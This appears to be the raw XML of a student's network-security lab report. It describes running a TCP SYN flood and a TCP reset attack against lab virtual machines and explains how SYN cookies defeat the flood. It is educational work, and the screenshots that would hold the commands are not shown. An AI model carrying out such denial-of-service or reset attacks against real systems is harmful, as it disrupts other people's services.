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86196" w14:textId="46592CD8" w:rsidR="008C1811" w:rsidRPr="008C1811" w:rsidRDefault="008C1811">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008C1811">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Lab 4 </w:t>
      </w:r>
      <w:r w:rsidRPr="008C1811">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="008C1811">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="008C1811">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="008C1811">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">Name: Pramod </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008C1811">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>kumar</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008C1811">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="008C1811">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:tab/>
        <w:t>pjk5502@psu.edu</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C3DA380" w14:textId="1230ACF8" w:rsidR="00C11906" w:rsidRDefault="00C11906">
      <w:r>
        <w:t xml:space="preserve">Machine names: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DCE618B" w14:textId="4F104176" w:rsidR="00C11906" w:rsidRDefault="00C11906" w:rsidP="00C11906">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Ubuntu security </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>class</w:t>
      </w:r>
      <w:r w:rsidR="00092697">
        <w:t xml:space="preserve"> :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00092697">
        <w:t xml:space="preserve"> 10.0.2.15</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23E6B56F" w14:textId="2197FBAC" w:rsidR="00C11906" w:rsidRDefault="00C11906" w:rsidP="00C11906">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Ubuntu security class second</w:t>
      </w:r>
      <w:r w:rsidR="00092697">
        <w:t>: 10.0.2.4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E28F720" w14:textId="469A39CD" w:rsidR="00C11906" w:rsidRDefault="00C11906" w:rsidP="00C11906">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Ubuntu security class third</w:t>
      </w:r>
      <w:r w:rsidR="00092697">
        <w:t>: 10.0.2.5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25A85A32" w14:textId="083025FC" w:rsidR="0030697E" w:rsidRDefault="0030697E" w:rsidP="0030697E"/>
    <w:p w14:paraId="3A2DEF97" w14:textId="2D8E04A5" w:rsidR="0030697E" w:rsidRDefault="0064495D" w:rsidP="0030697E">
      <w:r>
        <w:t xml:space="preserve">       </w:t>
      </w:r>
      <w:r w:rsidRPr="0064495D">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3C54EBAF" wp14:editId="20E265D4">
            <wp:extent cx="5883150" cy="192802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83150" cy="1928027"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4533A4FC" w14:textId="77777777" w:rsidR="00C11906" w:rsidRDefault="00C11906" w:rsidP="00C11906"/>
    <w:p w14:paraId="52D98436" w14:textId="61036E0E" w:rsidR="00C11906" w:rsidRPr="008C1811" w:rsidRDefault="00C11906" w:rsidP="00C11906">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008C1811">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Task 1:</w:t>
      </w:r>
      <w:r w:rsidR="004D201C" w:rsidRPr="008C1811">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008C1811">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>TCP sync attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66F92678" w14:textId="2DCD691F" w:rsidR="0064495D" w:rsidRDefault="0064495D" w:rsidP="00C11906">
      <w:r w:rsidRPr="0064495D">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="18DF5444" wp14:editId="37F7859B">
            <wp:extent cx="5943600" cy="31108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10865"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F188BFD" w14:textId="4ACC7A16" w:rsidR="004D201C" w:rsidRDefault="004D201C" w:rsidP="00C11906">
      <w:r>
        <w:t>Before attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E39D261" w14:textId="770889BD" w:rsidR="00786269" w:rsidRDefault="00544FC2" w:rsidP="00544FC2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">First client </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>make</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> a connection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D9921C1" w14:textId="45062955" w:rsidR="00544FC2" w:rsidRDefault="00544FC2" w:rsidP="00544FC2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Start the attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="186C8E3B" w14:textId="293CEFE0" w:rsidR="00544FC2" w:rsidRDefault="00544FC2" w:rsidP="00544FC2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Same client tries to make another connection </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21CB2890" w14:textId="3B32A8FF" w:rsidR="00544FC2" w:rsidRDefault="00544FC2" w:rsidP="00544FC2">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>Expected result: Step 3 shouldn’t succeed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27B58348" w14:textId="77777777" w:rsidR="00544FC2" w:rsidRDefault="00544FC2" w:rsidP="00C11906">
      <w:r w:rsidRPr="00544FC2">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Step 1:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4560FB09" w14:textId="2B24C561" w:rsidR="00544FC2" w:rsidRDefault="00544FC2" w:rsidP="00C11906">
      <w:r w:rsidRPr="00544FC2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>As you can see on Client machine, connection is established.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CB4DB0D" w14:textId="634AD613" w:rsidR="00544FC2" w:rsidRDefault="00544FC2" w:rsidP="00C11906">
      <w:r>
        <w:t>Victim Ip is 10.0.2.15</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D115773" w14:textId="0FE8B456" w:rsidR="00544FC2" w:rsidRPr="00544FC2" w:rsidRDefault="00544FC2" w:rsidP="00C11906">
      <w:r w:rsidRPr="00544FC2">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6D5AF3BF" wp14:editId="7B53337D">
            <wp:extent cx="5943600" cy="200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02790"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="175E2AC3" w14:textId="129B373C" w:rsidR="00544FC2" w:rsidRDefault="00544FC2" w:rsidP="00C11906"/>
    <w:p w14:paraId="67A2BBB5" w14:textId="39B158F5" w:rsidR="00544FC2" w:rsidRDefault="00544FC2" w:rsidP="00C11906">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00544FC2">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Step2: Start the attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63AE8BFD" w14:textId="7A1F61A1" w:rsidR="00544FC2" w:rsidRPr="00544FC2" w:rsidRDefault="00B14D09" w:rsidP="00C11906">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B14D09">
        <w:rPr>
          <w:b/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="20F14DE2" wp14:editId="52228058">
            <wp:extent cx="5943600" cy="2160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60270"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3593FE2B" w14:textId="3136EAB5" w:rsidR="00544FC2" w:rsidRDefault="00573F36" w:rsidP="00C11906">
      <w:r w:rsidRPr="00573F36">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2BD0425B" wp14:editId="3C3DB114">
            <wp:extent cx="594360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1105"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="22D6E26B" w14:textId="230DA171" w:rsidR="00573F36" w:rsidRDefault="00573F36" w:rsidP="00C11906"/>
    <w:p w14:paraId="344C023C" w14:textId="77777777" w:rsidR="00B14D09" w:rsidRDefault="00B14D09" w:rsidP="00C11906">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3CA2B06D" w14:textId="24BD4C42" w:rsidR="00573F36" w:rsidRPr="00B14D09" w:rsidRDefault="00573F36" w:rsidP="00C11906">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B14D09">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Step3: As attack is started. Lets make </w:t>
      </w:r>
      <w:r w:rsidR="00B14D09" w:rsidRPr="00B14D09">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>initiate</w:t>
      </w:r>
      <w:r w:rsidRPr="00B14D09">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> the new connection from </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00B14D09" w:rsidRPr="00B14D09">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>client</w:t>
      </w:r>
      <w:r w:rsidRPr="00B14D09">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B14D09">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>which already has one connection)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="406440D8" w14:textId="519A3AA5" w:rsidR="00573F36" w:rsidRDefault="00573F36" w:rsidP="00C11906">
      <w:r w:rsidRPr="00573F36">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3946BD94" wp14:editId="6894C362">
            <wp:extent cx="5943600" cy="3044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4190"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="24C89B84" w14:textId="0AD1BFA7" w:rsidR="00573F36" w:rsidRDefault="00573F36" w:rsidP="00C11906">
      <w:r>
        <w:t xml:space="preserve">In above image you can see that, after waiting for </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>3 minute</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>, Telnet timed out</w:t>
      </w:r>
      <w:r w:rsidR="00B14D09">
        <w:t xml:space="preserve"> and during new connection making it was always in SYNC_SENT mode. It means attack was successful.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CA58F95" w14:textId="744D915D" w:rsidR="00B14D09" w:rsidRDefault="00B14D09" w:rsidP="00C11906">
      <w:r>
        <w:t>While our old connection is still intact. As SYNC flood affect only.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ECE8190" w14:textId="334D56FE" w:rsidR="00B14D09" w:rsidRDefault="00B14D09" w:rsidP="00C11906"/>
    <w:p w14:paraId="390F1468" w14:textId="128EB439" w:rsidR="00B14D09" w:rsidRDefault="00B14D09" w:rsidP="00C11906"/>
    <w:p w14:paraId="07A4AB67" w14:textId="26E39C15" w:rsidR="00B14D09" w:rsidRDefault="00B14D09" w:rsidP="00C11906">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Now let’s try with cookies value as 1 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D77792D" w14:textId="3A48F47F" w:rsidR="00B14D09" w:rsidRDefault="00B14D09" w:rsidP="00C11906">
      <w:r w:rsidRPr="00B14D09">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1BD86F0D" wp14:editId="39FFD6E3">
            <wp:extent cx="5943600" cy="140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09700"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="001F3911" w14:textId="04E78E66" w:rsidR="00544FC2" w:rsidRDefault="00544FC2" w:rsidP="00C11906"/>
    <w:p w14:paraId="6F193015" w14:textId="34569156" w:rsidR="00B14D09" w:rsidRDefault="00B14D09" w:rsidP="00C11906"/>
    <w:p w14:paraId="781265E2" w14:textId="5E1008B4" w:rsidR="00B14D09" w:rsidRPr="00B00035" w:rsidRDefault="00B14D09" w:rsidP="00C11906">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B00035">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Start the attack again:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="282ABB02" w14:textId="21C2A5F7" w:rsidR="00B14D09" w:rsidRDefault="00B14D09" w:rsidP="00C11906">
      <w:r w:rsidRPr="00B14D09">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4365CC2C" wp14:editId="13B3C617">
            <wp:extent cx="59436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45995"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B47AEB1" w14:textId="72C30D29" w:rsidR="00B14D09" w:rsidRDefault="00B14D09" w:rsidP="00C11906">
      <w:r w:rsidRPr="00B14D09">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5B2A8473" wp14:editId="481B6575">
            <wp:extent cx="5943600" cy="2562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2860"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FDCCF90" w14:textId="460ACABA" w:rsidR="00B14D09" w:rsidRDefault="00B14D09" w:rsidP="00C11906"/>
    <w:p w14:paraId="1B57EE71" w14:textId="16A04903" w:rsidR="00B14D09" w:rsidRDefault="00B00035" w:rsidP="00C11906">
      <w:r w:rsidRPr="00B00035">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Client</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> NEW</w:t>
      </w:r>
      <w:r w:rsidRPr="00B00035">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> connection was successful</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Now</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> client has 2 connection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B749074" w14:textId="3F45AF89" w:rsidR="00B14D09" w:rsidRDefault="00B14D09" w:rsidP="00C11906">
      <w:r w:rsidRPr="00B14D09">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7A4C2800" wp14:editId="43DAB286">
            <wp:extent cx="5943600" cy="2900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0680"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F6BEDB6" w14:textId="1A8B623F" w:rsidR="00446D68" w:rsidRDefault="00446D68" w:rsidP="00C11906"/>
    <w:p w14:paraId="7044B990" w14:textId="063F2593" w:rsidR="00446D68" w:rsidRDefault="00446D68" w:rsidP="00C11906">
      <w:r>
        <w:t xml:space="preserve">TCP SYN cookies generate random sequence number which </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> don’t have to cache it. When TCP receive </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>a</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> ACK, it will match the sequence number against the function which will determine that weather the given number is legitimate or not. Hence TCP don’t have to store this information and TCP won</w:t>
      </w:r>
      <w:r w:rsidR="00EC7CA5">
        <w:t>’</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">t run out of resources. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13636777" w14:textId="6784F5E1" w:rsidR="00446D68" w:rsidRDefault="00446D68" w:rsidP="00C11906"/>
    <w:p w14:paraId="72D994AC" w14:textId="77777777" w:rsidR="00446D68" w:rsidRDefault="00446D68" w:rsidP="00C11906"/>
    <w:p w14:paraId="0CEC9A60" w14:textId="310E031C" w:rsidR="00B62202" w:rsidRPr="008C1811" w:rsidRDefault="00714D8A" w:rsidP="00C11906">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008C1811">
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Task 2:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="019A1F6B" w14:textId="141CBE4F" w:rsidR="00714D8A" w:rsidRDefault="00714D8A" w:rsidP="00C11906">
      <w:r>
        <w:t>Victim</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DEEFC7C" w14:textId="4F86BAE6" w:rsidR="00714D8A" w:rsidRDefault="00714D8A" w:rsidP="00C11906">
      <w:r w:rsidRPr="00714D8A">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5BAC52F0" wp14:editId="7236880B">
            <wp:extent cx="5943600" cy="2035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35810"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EBCF1DA" w14:textId="31973268" w:rsidR="00136D99" w:rsidRDefault="00136D99" w:rsidP="00C11906"/>
    <w:p w14:paraId="10757D27" w14:textId="064EEB95" w:rsidR="00136D99" w:rsidRDefault="00136D99" w:rsidP="00C11906"/>
    <w:p w14:paraId="1CB05F44" w14:textId="746B1E6A" w:rsidR="00136D99" w:rsidRDefault="008C1811" w:rsidP="00C11906">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Client</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidR="00136D99">
        <w:t xml:space="preserve"> machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16979047" w14:textId="77777777" w:rsidR="00136D99" w:rsidRDefault="00136D99" w:rsidP="00C11906"/>
    <w:p w14:paraId="6DC64C78" w14:textId="546F5C39" w:rsidR="00136D99" w:rsidRDefault="00136D99" w:rsidP="00C11906">
      <w:r w:rsidRPr="00136D99">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="24648248" wp14:editId="3FD410CE">
            <wp:extent cx="5943600" cy="2432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32050"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F31DF3B" w14:textId="5D8CC951" w:rsidR="00136D99" w:rsidRDefault="00136D99" w:rsidP="00C11906"/>
    <w:p w14:paraId="7D141046" w14:textId="05C14432" w:rsidR="00136D99" w:rsidRDefault="00136D99" w:rsidP="00C11906"/>
    <w:p w14:paraId="6261E1E4" w14:textId="62D420A3" w:rsidR="00136D99" w:rsidRDefault="00136D99" w:rsidP="00C11906">
      <w:r>
        <w:t>After attack:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EF50446" w14:textId="754AFAB2" w:rsidR="00136D99" w:rsidRDefault="00136D99" w:rsidP="00C11906">
      <w:r>
        <w:t xml:space="preserve">Client </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Pcap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> scan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5880634B" w14:textId="682C68DE" w:rsidR="00942DDD" w:rsidRDefault="00942DDD" w:rsidP="00C11906">
      <w:r w:rsidRPr="00942DDD">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="719FE81B" wp14:editId="62DA34E7">
            <wp:extent cx="5943600" cy="2240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40915"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ABFFC85" w14:textId="7F93333A" w:rsidR="00942DDD" w:rsidRDefault="00942DDD" w:rsidP="00C11906"/>
    <w:p w14:paraId="4D213807" w14:textId="121F2FB5" w:rsidR="00942DDD" w:rsidRDefault="00942DDD" w:rsidP="00C11906">
      <w:r>
        <w:t>Attacker screen</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5175F8D0" w14:textId="54604747" w:rsidR="00942DDD" w:rsidRDefault="00942DDD" w:rsidP="00C11906">
      <w:r w:rsidRPr="00942DDD">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0C9B43D7" wp14:editId="525DF157">
            <wp:extent cx="5943600" cy="19983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8345"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="11CDCFB1" w14:textId="16005D26" w:rsidR="00136D99" w:rsidRDefault="00942DDD" w:rsidP="00C11906">
      <w:r>
        <w:t>Client Screen</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27023D45" w14:textId="790070F7" w:rsidR="00942DDD" w:rsidRDefault="00942DDD" w:rsidP="00C11906">
      <w:r w:rsidRPr="00942DDD">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="44796CEA" wp14:editId="6D01B35D">
            <wp:extent cx="5943600" cy="2961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1005"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="20FAB62F" w14:textId="12EBEB18" w:rsidR="00942DDD" w:rsidRDefault="00942DDD" w:rsidP="00C11906"/>
    <w:p w14:paraId="7FA6BBD3" w14:textId="3A809220" w:rsidR="00942DDD" w:rsidRDefault="00942DDD" w:rsidP="00C11906"/>
    <w:p w14:paraId="7172B4DB" w14:textId="1A9268ED" w:rsidR="00942DDD" w:rsidRDefault="00106FB6" w:rsidP="00C11906">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Lets</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> try connecting again, As attack is going on, attacker will sent Reset as soon as client tries to connect.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26097A2C" w14:textId="7DCFFD66" w:rsidR="00106FB6" w:rsidRDefault="00106FB6" w:rsidP="00C11906">
      <w:r w:rsidRPr="00106FB6">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="276CAAAD" wp14:editId="4A9BAF18">
            <wp:extent cx="5943600" cy="2974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4975"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F391FD3" w14:textId="6F3C4015" w:rsidR="00106FB6" w:rsidRDefault="00106FB6" w:rsidP="00C11906"/>
    <w:p w14:paraId="7573605C" w14:textId="664497A4" w:rsidR="00106FB6" w:rsidRDefault="00106FB6" w:rsidP="00C11906"/>
    <w:p w14:paraId="707A4FE8" w14:textId="1F58759D" w:rsidR="00106FB6" w:rsidRDefault="00106FB6" w:rsidP="00C11906"/>
    <w:p w14:paraId="1FA4C51B" w14:textId="4DE5D028" w:rsidR="00106FB6" w:rsidRDefault="0003078E" w:rsidP="00C11906">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Lets</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> test the attach with “SSH”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="046F71F7" w14:textId="7C228735" w:rsidR="0003078E" w:rsidRDefault="0003078E" w:rsidP="00C11906">
      <w:r>
        <w:t>Attacker screen:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53A9F39D" w14:textId="78E002C8" w:rsidR="0003078E" w:rsidRDefault="0003078E" w:rsidP="00C11906">
